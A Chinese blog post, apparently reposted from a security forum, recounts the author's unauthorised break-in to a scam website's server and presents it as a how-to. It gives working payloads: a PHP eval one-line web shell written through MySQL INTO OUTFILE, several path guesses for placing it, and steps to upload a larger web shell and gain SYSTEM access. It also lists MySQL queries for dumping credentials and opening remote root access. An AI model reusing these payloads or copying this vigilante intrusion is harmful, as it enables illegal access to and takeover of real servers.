智斗网络刷单骗局(实战渗透骗子刷单网站)

前段时间有看到过LOL小智的粉丝因为兼职刷单被骗的消息,下午比较闲,正好群里有骗子在发刷单的兼职,决定尝试搞一波。

智斗网络刷单骗局(实战渗透骗子刷单网站)(1)

果断加骗子好友,首先发了一份工作流程介绍文章给我,让我了解下工作流程,然后让填一份入职申请表,想不到骗子还有这些入职流程,也难怪一些安全意识不高的朋友能够被骗。用假的身份填完之后,就开始刷单任务了,骗子发来了链接,获取到了目标地址,然后随便找个理由结束聊天。

智斗网络刷单骗局(实战渗透骗子刷单网站)(2)

智斗网络刷单骗局(实战渗透骗子刷单网站)(3)

智斗网络刷单骗局(实战渗透骗子刷单网站)(4)

智斗网络刷单骗局(实战渗透骗子刷单网站)(5)

首先打开Awvs扫描器扫一波,发现网站无法访问了,网站安装了防火墙,封了我ip,骗子安全意识还挺高,换个ip继续。

不能扫漏洞,扫下端口总可以吧,Nmap扫描发现开放了3306和3389。

智斗网络刷单骗局(实战渗透骗子刷单网站)(6)

智斗网络刷单骗局(实战渗透骗子刷单网站)(7)

智斗网络刷单骗局(实战渗透骗子刷单网站)(8)

尝试连接下数据库,账号:root,密码:****(网站域名),卧槽,竟然登录成功了,平静一下激动的心情。

智斗网络刷单骗局(实战渗透骗子刷单网站)(9)

智斗网络刷单骗局(实战渗透骗子刷单网站)(10)

看了下注册用户信息,找了下管理员账号密码,但是没找到后台,尝试直接写入一句话木马,现在已经对用户信息不感冒了。写入一句话木马需要知道网站的绝对路径,现在只能靠猜了,首先

select @@basedir;

查看下数据库的安装路径:

智斗网络刷单骗局(实战渗透骗子刷单网站)(11)

发现网站管理员竟然是用的phpstudy搭建的网站,因为我最开始学渗透时就是使用phpstudy搭建的测试环境,所以有点喜出望外,赶紧准备写入一句话木马:

select '<?php @eval($_POST["lzx"]);?>' into outfile 'C:/phpStudy/WWW/1.php';

智斗网络刷单骗局(实战渗透骗子刷单网站)(12)

没想到管理员并没有将网站放在phpstudy默认的WWW目录下,木马写入失败,于是开始各种尝试:

select '<?php @eval($_POST["lzx"]);?>' into outfile 'C:/phpStudy/WWWROOT/1.php';

select '<?php @eval($_POST["lzx"]);?>' into outfile 'D:/1.php';

select '<?php @eval($_POST["lzx"]);?>' into outfile 'C:/www/1.php';

...

最终还是让我找到了网站的绝对路径“C:/www/www.网站域名.com/”,成功写入一句话:

智斗网络刷单骗局(实战渗透骗子刷单网站)(13)

菜刀连接之:

智斗网络刷单骗局(实战渗透骗子刷单网站)(14)

上传大马:

智斗网络刷单骗局(实战渗透骗子刷单网站)(15)

访问大马:

智斗网络刷单骗局(实战渗透骗子刷单网站)(16)

获取系统system权限:

智斗网络刷单骗局(实战渗透骗子刷单网站)(17)

下一步就是添加管理员账号,3389远程桌面连接了,但是在大马中执行net命令报错,暂时还没有找到解决办法。入侵到此为止,后续找到突破办法之后再更新。

总结一下:

MySQL数据库拿到访问权之后的一些信息收集语句:

显示版本:select version();

显示字符集:select @@character_set_database;

显示数据库show databases;

显示表名:show tables;

显示计算机名:select @@hostname;

显示系统版本:select @@version_compile_os;

显示mysql路径:select @@basedir;

显示数据库路径:select @@datadir;

显示root密码:select User,Password from mysql.user;

开启外连:GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;

与同事交流之后,原来是使用net命名添加管理员时,密码设置的过于简单,服务器又配置了密码策略,所以换个复杂点的密码就添加成功了。

智斗网络刷单骗局(实战渗透骗子刷单网站)(18)

智斗网络刷单骗局(实战渗透骗子刷单网站)(19)

智斗网络刷单骗局(实战渗透骗子刷单网站)(20)

本文作者:Noble_LzX,转载自:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=22539&highlight

,

免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com

    分享
    投诉
    首页